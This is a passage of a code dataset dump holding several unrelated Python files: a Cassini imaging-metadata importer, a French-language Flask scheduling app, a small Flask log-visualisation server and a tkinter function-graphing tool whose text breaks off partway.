filter1, filter2)\n if central_wl is None or fwhm is None:\n return None\n return (central_wl - fwhm/2) / 1000 # microns\n\n def field_obs_wavelength_wavelength2(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n central_wl, fwhm, effective_wl = self._coiss_wavelength_helper(\n camera, filter1, filter2)\n if central_wl is None or fwhm is None:\n return None\n return (central_wl + fwhm/2) / 1000 # microns\n\n def field_obs_wavelength_wave_res1(self):\n return self._wave_res_from_full_bandwidth()\n\n def field_obs_wavelength_wave_res2(self):\n return self.field_obs_wavelength_wave_res1()\n\n def field_obs_wavelength_wave_no_res1(self):\n return self._wave_no_res_from_full_bandwidth()\n\n def field_obs_wavelength_wave_no_res2(self):\n return self.field_obs_wavelength_wave_no_res1()\n\n def field_obs_wavelength_polarization_type(self):\n the_filter = self._combined_filter()\n if the_filter.find('P') != -1:\n return self._create_mult('LINEAR')\n return self._create_mult('NONE')\n\n\n #######################################\n ### OVERRIDE FROM ObsMissionCassini ###\n #######################################\n\n def field_obs_mission_cassini_spacecraft_clock_count1(self):\n partition = self._index_col('SPACECRAFT_CLOCK_CNT_PARTITION')\n count = self._index_col('SPACECRAFT_CLOCK_START_COUNT')\n sc = str(partition) + '/' + str(count)\n sc = self._fix_cassini_sclk(sc)\n try:\n sc_cvt = opus_support.parse_cassini_sclk(sc)\n except Exception as e:\n self._log_nonrepeating_error(f'Unable to 
parse Cassini SCLK \"{sc}\": {e}')\n return None\n return sc_cvt\n\n def field_obs_mission_cassini_spacecraft_clock_count2(self):\n partition = self._index_col('SPACECRAFT_CLOCK_CNT_PARTITION')\n count = self._index_col('SPACECRAFT_CLOCK_STOP_COUNT')\n sc = str(partition) + '/' + str(count)\n sc = self._fix_cassini_sclk(sc)\n try:\n sc_cvt = opus_support.parse_cassini_sclk(sc)\n except Exception as e:\n self._log_nonrepeating_error(f'Unable to parse Cassini SCLK \"{sc}\": {e}')\n return None\n\n sc1 = self.field_obs_mission_cassini_spacecraft_clock_count1()\n if sc1 is not None and sc_cvt < sc1:\n self._log_nonrepeating_warning(\n f'spacecraft_clock_count1 ({sc1}) and spacecraft_clock_count2 '+\n f'({sc_cvt}) are in the wrong order - setting to count1')\n sc_cvt = sc1\n else:\n image_number = self._index_col('IMAGE_NUMBER')\n sc2_int = int(sc_cvt)\n if int(image_number) != sc2_int:\n self._log_nonrepeating_warning(\n f'spacecraft_clock_count2 ({sc_cvt}) and COISS IMAGE_NUMBER '+\n f'({image_number}) don\\'t match')\n\n return sc_cvt\n\n def field_obs_mission_cassini_ert1(self):\n return self._time_from_index(column='EARTH_RECEIVED_START_TIME')\n\n def field_obs_mission_cassini_ert2(self):\n return self._time2_from_index(self.field_obs_mission_cassini_ert1(),\n column='EARTH_RECEIVED_STOP_TIME')\n\n def field_obs_mission_cassini_mission_phase_name(self):\n mp = self._index_col('MISSION_PHASE_NAME')\n if mp.upper() == 'NULL':\n return self._create_mult(None)\n return self._create_mult(mp.replace('_', ' '))\n\n def field_obs_mission_cassini_sequence_id(self):\n return self._index_col('SEQUENCE_ID')\n\n\n ##############################################\n ### FIELD METHODS FOR obs_instrument_coiss ###\n ##############################################\n\n def field_obs_instrument_coiss_opus_id(self):\n return self.opus_id\n\n def field_obs_instrument_coiss_volume_id(self):\n return self.volume\n\n def field_obs_instrument_coiss_instrument_id(self):\n return self.instrument_id\n\n def field_obs_instrument_coiss_data_conversion_type(self):\n return self._create_mult(self._index_col('DATA_CONVERSION_TYPE'))\n\n def field_obs_instrument_coiss_compression_type(self):\n return self._create_mult(self._index_col('INST_CMPRS_TYPE'))\n\n def field_obs_instrument_coiss_gain_mode_id(self):\n return self._create_mult(self._index_col('GAIN_MODE_ID'))\n\n def field_obs_instrument_coiss_image_observation_type(self):\n obs_type = self._index_col('IMAGE_OBSERVATION_TYPE')\n\n # Sometimes they have both SCIENCE,OPNAV and OPNAV,SCIENCE so normalize\n # the order\n ret_list = []\n if obs_type.find('SCIENCE') != -1:\n ret_list.append('SCIENCE')\n if obs_type.find('OPNAV') != -1:\n ret_list.append('OPNAV')\n if obs_type.find('CALIBRATION') != -1:\n ret_list.append('CALIBRATION')\n if obs_type.find('ENGINEERING') != -1:\n ret_list.append('ENGINEERING')\n if obs_type.find('SUPPORT') != -1:\n ret_list.append('SUPPORT')\n if obs_type.find('UNK') != -1:\n ret_list.append('UNKNOWN')\n\n ret = '/'.join(ret_list)\n\n # If the result isn't the same length as what we started with, we must've\n # encountered a new type we didn't know about\n if len(ret) != len(obs_type.replace('UNK','UNKNOWN')):\n self._log_nonrepeating_error(\n f'Unknown format for COISS image_observation_type: \"{obs_type}\"')\n return self._create_mult(None)\n\n return self._create_mult(ret)\n\n def field_obs_instrument_coiss_missing_lines(self):\n return self._index_col('MISSING_LINES')\n\n def field_obs_instrument_coiss_shutter_mode_id(self):\n return 
self._create_mult(self._index_col('SHUTTER_MODE_ID'))\n\n def field_obs_instrument_coiss_shutter_state_id(self):\n return self._create_mult(self._index_col('SHUTTER_STATE_ID'))\n\n def field_obs_instrument_coiss_image_number(self):\n return self._index_col('IMAGE_NUMBER')\n\n def field_obs_instrument_coiss_instrument_mode_id(self):\n return self._create_mult(self._index_col('INSTRUMENT_MODE_ID'))\n\n def field_obs_instrument_coiss_target_desc(self):\n target_desc = self._index_col('TARGET_DESC').upper()\n if target_desc in COISS_TARGET_DESC_MAPPING:\n target_desc = COISS_TARGET_DESC_MAPPING[target_desc]\n return self._create_mult(target_desc)\n\n def _combined_filter(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n filter1, filter2 = self._index_col('FILTER_NAME')\n\n central_wl1, fwhm1, wl1 = self._coiss_wavelength_helper(camera, filter1, 'CL2')\n central_wl2, fwhm2, wl2 = self._coiss_wavelength_helper(camera, 'CL1', filter2)\n\n new_filter = None\n\n if filter1 == 'CL1' and filter2 == 'CL2':\n new_filter = 'CLEAR'\n elif filter1 == 'CL1':\n new_filter = filter2\n elif filter2 == 'CL2':\n new_filter = filter1\n else:\n # If one of them is a polarizer, put it second\n if filter1.find('P') != -1:\n new_filter = filter2 + '+' + filter1\n elif filter2.find('P') != -1:\n new_filter = filter1 + '+' + filter2\n else:\n if (((wl1 is None or wl2 is None or wl1 == wl2) and\n filter1 > filter2) or\n wl1 > wl2):\n # Place filters in wavelength order\n # If wavelengths are the same, make it name order\n filter1, filter2 = filter2, filter1\n new_filter = filter1 + '+' + filter2\n\n return new_filter\n\n def field_obs_instrument_coiss_combined_filter(self):\n new_filter = self._combined_filter()\n return self._create_mult_keep_case(new_filter)\n\n def field_obs_instrument_coiss_camera(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n assert camera in ('N', 'W')\n return self._create_mult(camera)\n","sub_path":"opus/import/obs_instrument_coiss.py","file_name":"obs_instrument_coiss.py","file_ext":"py","file_size_in_byte":21181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"347038965","text":"from flask import Flask, render_template, request, session, redirect, url_for, g\nfrom db import recuperer_compte, creer_compte, creer_emploi, creer_lieu, creer_groupe, recuperer_lieux, recuperer_emplois, recuperer_groupes, inserer_horaire, inserer_personne_groupe, recuperer_membre_de_groupe, recuperer_horaire_de_groupe, modifier_adresse, suppr_emploi, suppr_lieu, suppr_groupe, suppr_mb_de_groupe\nimport datetime\nfrom date import current_week, str_to_list, Horaire\nfrom werkzeug.security import check_password_hash\nimport sqlite3 as db\n\napp = Flask(__name__)\napp.secret_key = \"dev\"\n\nemplois = []\nmes_groupes = []\nmes_lieux = []\nhoraire = Horaire()\ncday = datetime.date.today()\nsemaine = current_week(cday)\n\n@app.route('/')\ndef set_session():\n session.clear()\n return redirect(url_for('accueil'))\n\n@app.route('/accueil')\ndef accueil():\n return render_template('accueil.html')\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n erreur = False\n if request.method == \"POST\":\n login = request.form[\"login\"]\n mdp = request.form[\"mdp\"]\n check = recuperer_compte(login)\n if check is None:\n session.clear()\n erreur = True\n elif check_password_hash(check[1],mdp):\n session.clear()\n session['userid'] = check[0]\n session[\"username\"] = login\n session[\"usernickname\"] = check[2]\n return 
redirect(url_for('accueil'))\n        else:\n            session.clear()\n            erreur = True\n    return render_template('login.html',erreur=erreur)\n\n@app.route('/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('accueil'))\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n    if request.method == \"POST\":\n        for _, value in request.form.items():\n            if value == \"\":\n                return redirect(url_for('register', erreur_none=True))\n        login = request.form[\"login\"]\n        mdp = request.form[\"mdp\"]\n        mdpcheck = request.form[\"mdpcheck\"]\n        pseudo = request.form[\"pseudo\"]\n        if recuperer_compte(login) is not None:\n            return redirect(url_for('register', erreur_id=True))\n        if mdp != mdpcheck:\n            return redirect(url_for('register', erreur_mdp=True))\n        creer_compte(login,mdp,pseudo)\n        return redirect(url_for('login'))\n    if 'erreur_id' in request.args:\n        return render_template('register.html',erreur_id=request.args['erreur_id'])\n    elif 'erreur_mdp' in request.args:\n        return render_template('register.html',erreur_mdp=request.args['erreur_mdp'])\n    elif 'erreur_none' in request.args:\n        return render_template('register.html',erreur_none=request.args['erreur_none'])\n    else:\n        return render_template('register.html')\n\n@app.route('/profil')\ndef profil():\n    global emplois\n    global cday\n    global semaine\n    emplois = recuperer_emplois(session['userid'])\n    cday = datetime.date.today()\n    semaine = current_week(cday)\n    horaires = recuperer_horaire_de_groupe(session['userid'])\n    return render_template('profil.html', infos = (emplois, horaires))\n\n@app.route('/groupes')\ndef groupes():\n    global mes_groupes\n    mes_groupes = recuperer_groupes(session['userid'])\n    return render_template('groupes.html', groupes = mes_groupes)\n\n@app.route('/lieux')\ndef lieux():\n    global mes_lieux\n    mes_lieux = recuperer_lieux(session['userid'])\n    return render_template('lieux.html', lieux = mes_lieux)\n\n@app.route('/supprimer_emploi/<id_emploi>')\ndef supprimer_emploi(id_emploi):\n    suppr_emploi(id_emploi)\n    return redirect(url_for('profil'))\n\n@app.route('/supprimer_lieu/<id_lieu>')\ndef supprimer_lieu(id_lieu):\n    suppr_lieu(id_lieu)\n    return redirect(url_for('lieux'))\n\n@app.route('/supprimer_groupe/<id_groupe>')\ndef supprimer_groupe(id_groupe):\n    suppr_groupe(id_groupe)\n    return redirect(url_for('groupes'))\n\n@app.route('/supprimer_mb_g/<ids>')\ndef supprimer_mb_g(ids):\n    ids = str_to_list(ids)\n    id_m, id_g = ids[0], ids[1]\n    suppr_mb_de_groupe(id_m, id_g)\n    return redirect(url_for('groupes'))\n\n@app.route('/ajouter_emploi', methods=[\"GET\", \"POST\"])\ndef ajouter_emploi():\n    if request.method == \"POST\":\n        creer_emploi(request.form['nom'], session['userid'])\n        return redirect(url_for('profil'))\n    else:\n        return render_template('ajouter_emploi.html')\n\n@app.route('/ajouter_lieu', methods=[\"GET\", \"POST\"])\ndef ajouter_lieu():\n    if request.method == \"POST\":\n        creer_lieu(session['userid'], request.form['nom'], request.form['adresse'])\n        return redirect(url_for('lieux'))\n    else:\n        return render_template('ajouter_lieu.html')\n\n@app.route('/ajouter_groupe', methods=[\"GET\", \"POST\"])\ndef ajouter_groupe():\n    if request.method == \"POST\":\n        creer_groupe(session['userid'], request.form['nom'])\n        return redirect(url_for('groupes'))\n    else:\n        return render_template('ajouter_groupe.html')\n\n@app.route('/modifier_emploi', methods=[\"GET\", \"POST\"])\ndef modifier_emploi():\n    global cday\n    global semaine\n    if request.method == \"POST\":\n
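        # save the selected time range (with place, group and description) as an entry of the current timetable\n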
        inserer_horaire(horaire, request.form[\"lieu\"], session['emploicourant'][0][2], request.form[\"groupe\"], request.form[\"desc\"])\n        horaire.reset()\n        return redirect(url_for('modifier_emploi'))\n    if 'action' in request.args:\n        retour = request.args[\"action\"]\n        if retour == 'reset':\n            horaire.reset()\n        elif retour == 'next':\n            cday += datetime.timedelta(days = 7)\n            semaine = current_week(cday)\n        elif retour == 'previous':\n            cday -= datetime.timedelta(days = 7)\n            semaine = current_week(cday)\n        else:\n            retour = str_to_list(request.args[\"action\"])\n            borne_selec = datetime.datetime(semaine[retour[1]].jour.year, semaine[retour[1]].jour.month, semaine[retour[1]].jour.day, retour[0])\n            horaire.set_borne(borne_selec)\n    else:\n        horaire.reset()\n    session[\"groupes\"] = recuperer_groupes(session['userid'])\n    session[\"lieux\"] = recuperer_lieux(session['userid'])\n    return render_template('modifier_emploi.html', infos=(horaire, semaine, datetime.date.today()))\n\n@app.route('/modifier_groupe', methods=[\"GET\", \"POST\"])\ndef modifier_groupe():\n    if request.method == \"POST\":\n        membre = recuperer_compte(request.form[\"login\"])\n        if membre is None:\n            return redirect(url_for('modifier_groupe', erreur=True))\n        inserer_personne_groupe(request.form[\"login\"],session[\"groupecourant\"][0][1])\n        return redirect(url_for('modifier_groupe'))\n    if 'erreur' in request.args:\n        return render_template('modifier_groupe.html', erreur=request.args['erreur'])\n    else:\n        return render_template('modifier_groupe.html')\n\n@app.route('/modifier_lieu', methods=[\"GET\", \"POST\"])\ndef modifier_lieu():\n    if request.method == \"POST\":\n        modifier_adresse(session['lieucourant'][0], request.form['nouvad'])\n        return redirect(url_for('lieux'))\n    else:\n        return render_template('modifier_lieu.html')\n\n@app.route('/select/<retour>')\ndef select(retour):\n    return redirect(url_for('modifier_emploi', action=retour))\n\n@app.route('/setemploi/<id_emploi>')\ndef setemploi(id_emploi):\n    for emploi in emplois:\n        if emploi[0][2] == int(id_emploi):\n            session['emploicourant'] = emploi\n    return redirect(url_for('modifier_emploi'))\n\n@app.route('/setgroupe/<id_groupe>')\ndef setgroupe(id_groupe):\n    for groupe in mes_groupes:\n        if groupe[0][1] == int(id_groupe):\n            session['groupecourant'] = groupe\n    return redirect(url_for('modifier_groupe'))\n\n@app.route('/setlieu/<id_lieu>')\ndef setlieu(id_lieu):\n    for lieu in mes_lieux:\n        if lieu[0] == int(id_lieu):\n            session['lieucourant'] = lieu\n    return redirect(url_for('modifier_lieu'))\n\n@app.route(\"/supprimer/<id_article>\")\ndef supprimer(id_article):\n    return redirect(url_for('accueil'))\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"522196676","text":"from flask import Flask, render_template, request\nimport RenderOsmMap\nfrom ParseLogs import get_logs_in_range\nimport yaml\nimport sys\nimport os\n\napp = Flask(__name__,\n            static_url_path=\"\",\n            static_folder=\"output\",\n            template_folder=\"output\")\n\n\n@app.route('/')\ndef send_visualization_layout():\n    return render_template('layout.html')\n\n\n@app.route('/logs')\ndef send_metric():\n    logPath = request.args.get('logPath')\n    min = request.args.get('min')\n    max = request.args.get('max')\n    return get_logs_in_range(logPath, min, max)\n\n\nif __name__ == \"__main__\":\n    with open(sys.argv[1], 'rt', encoding='utf8') as stream:\n        try:\n            config = yaml.safe_load(stream)  # safe_load parses plain YAML without constructing arbitrary objects\n            directoryPath = config['logs']['directory']\n            for metric in config['logs']['metrics']:\n                metric[\"logName\"] = os.path.join(directoryPath, metric[\"logName\"])\n
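            # render the map and metric overlays into ./output before the server starts serving them\n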
            RenderOsmMap.render_visualization(config['city'], config['logs']['metrics'], config['legends'])\n        except yaml.YAMLError as exc:\n            print(\"The visualization config is not valid YAML\")\n\n    app.run(\"localhost\")\n","sub_path":"visualizer/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"12175908","text":"import tkinter as tk\nfrom tkinter import StringVar, ttk\nimport math\nimport random\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg # NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import Slider\nimport numpy\n\n\nclass Graph:\n    def update_line(self, function, ax, functions_id):\n        line = ax.lines[functions_id]\n        print(\"UPDATING LINE: \", line)\n        temp = function.calculate()\n        line.set_data(temp[0], temp[1])\n        print(line, functions_id)\n        line.set_label(functions_id + 1)\n        self.canvas.draw()\n        self.ax.legend()\n\n    def add_line(self, function, ax, functions_id):\n        print(\"add_line FunctionBarOBJ and ID\", function, functions_id)\n        self.functions_list.append(function)\n        temp = function.calculate()\n        print(\"Result from calculation: \", temp[1])\n\n        ax.plot(temp[0], temp[1], label = str(functions_id + 1))\n        self.ax = ax\n        self.ax.legend()\n        self.canvas.draw()\n        temp2 = ax.lines[functions_id]\n        function.get_line(temp2)\n\n    def update_id(self):\n        temp = 0\n        for i in self.functions_list:\n            i.id = temp\n            print(i.id)\n            temp += 1\n            i.update_line()\n\n    def delete_line(self, line, id):\n        print(line, id)\n        line.remove()\n        self.functions_list.pop(id)\n        temp = 0\n        print(\"FOR LOOP STARTS\")\n        for i in self.functions_list:\n            i.id = temp\n            print(i.id)\n            temp += 1\n            i.update_line()\n            i.drop_down(i.degree.get())\n        print(\"FOR LOOP STOPS\")\n        self.canvas.draw()\n        self.ax.legend()\n\n    def __init__(self, f, root):\n        self.canvas = FigureCanvasTkAgg(f, root)\n        self.canvas.get_tk_widget().pack(side = 'right', fill = 'both', expand = True)\n        self.functions_list = []\n\n\nclass FunctionBar:\n    def get_line(self, line):\n        self.line = line\n\n    def update_line(self):\n        self.window.update_line(self, self.window.ax, self.id)\n\n    def calculate(self):\n        # print(\"A, B, C and D: \", self.a, self.b, self.c, self.d)\n        x = []\n        y = []\n        # print(\"inside calculate \", self.degree.get())\n        if self.degree.get() == \"First degree\": # 2x - 1 a=2, b=1\n            for i in range(-21, 21):\n                x.append(i)\n                j = self.a * i - self.b\n                y.append(j)\n\n        if self.degree.get() == \"Second degree\": # 2x^2 - 5x - 5\n            for i in numpy.arange(-21, 21, 0.01):\n                x.append(i)\n                j = self.a * i * i - self.b * i - self.c\n                y.append(j)\n        if self.degree.get() == \"Third degree\": # 2x^3 - 5x^2 -4x - 5\n            for i in numpy.arange(-21, 21, 0.01):\n                x.append(i)\n                j = self.a * i * i * i - self.b * i * i - self.c * i - self.d\n                y.append(j)\n        if self.degree.get() == \"Logarithm\": # -5 log2(5x)- 6 a=-5, b=2, c=5, d=6\n            for i in numpy.arange(-1, 21, 0.0001):\n                if self.b > 1 and self.c * i > 0:\n                    x.append(i)\n                    j = self.a * math.log((self.c * i), self.b) - self.d\n                    y.append(j)\n        if self.degree.get() == \"sin(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n            for i in numpy.arange(-21, 21, 0.01):\n                x.append(i)\n                j = self.a * math.sin(self.b * i) - self.c\n                y.append(j)\n        if self.degree.get() == \"cos(x)\": # -2 cos(3x)- 4 a=-2, b=3, c= 4\n            for i in numpy.arange(-21, 21, 0.01):\n                x.append(i)\n                j = self.a * math.cos(self.b * i) - self.c\n                y.append(j)\n        if self.degree.get() == \"tan(x)\": # -2 tan(3x)- 4 a=-2, 
b=3, c= 4\n tol = 30\n for i in numpy.arange(-21, 21, 0.01):\n if math.cos(self.b * i) != 0:\n x.append(i)\n j = self.a * math.tan(self.b * i) - self.c\n if j < -tol or j > tol:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arcsin(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.asin(self.b * i) - self.c\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arccos(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.acos(self.b * i) - self.c\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"arctan(x)\": # -2 sin(3x)- 4 a=-2, b=3, c= 4\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n j = self.a * math.atan(self.b * i) - self.c\n y.append(j)\n if self.degree.get() == \"√(x)\": # -2 √(1x - 3) -6\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.sqrt(self.b * i - self.c) - self.d\n except ValueError:\n j = numpy.nan\n y.append(j)\n if self.degree.get() == \"x\\u207F\": # 3 x^(2x -1) -2\n for i in numpy.arange(-21, 21, 0.01):\n x.append(i)\n try:\n j = self.a * math.pow(i, self.b * i - self.c) - self.d\n except ValueError:\n j = numpy.nan\n y.append(j)\n temp = [x, y]\n return temp\n\n def drop_down(self, degree, firsttime = False):\n frame = self.function\n if degree == \"First degree\":\n self.first_degree(frame)\n elif degree == \"Second degree\":\n self.second_degree(frame)\n elif degree == \"Third degree\":\n self.third_degree(frame)\n elif degree == \"Logarithm\":\n self.log(frame)\n elif degree == \"sin(x)\":\n self.sin(frame)\n elif degree == \"cos(x)\":\n self.cos(frame)\n elif degree == \"tan(x)\":\n self.tan(frame)\n elif degree == \"arcsin(x)\":\n self.arcsin(frame)\n elif degree == \"arccos(x)\":\n self.arccos(frame)\n elif degree == \"arctan(x)\":\n self.arctan(frame)\n elif degree == \"√(x)\":\n self.sqrt(frame)\n elif degree == \"x\\u207F\":\n self.xtox(frame)\n\n if firsttime is False:\n self.update_line()\n\n def first_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 5, row = 0)\n\n def second_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x² - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def third_degree(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = 
tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x³ - \", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x² - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def log(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"log\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"(\", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def sin(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"sin(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def cos(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"cos(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def tan(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n 
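# rebuilds this row's entry widgets for a*tan(b*x) - c, matching the \"tan(x)\" branch of calculate() above\n 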
fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"tan(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arcsin(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arcsin(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arccos(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arccos(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def arctan(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"arctan(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x) - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n def sqrt(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = 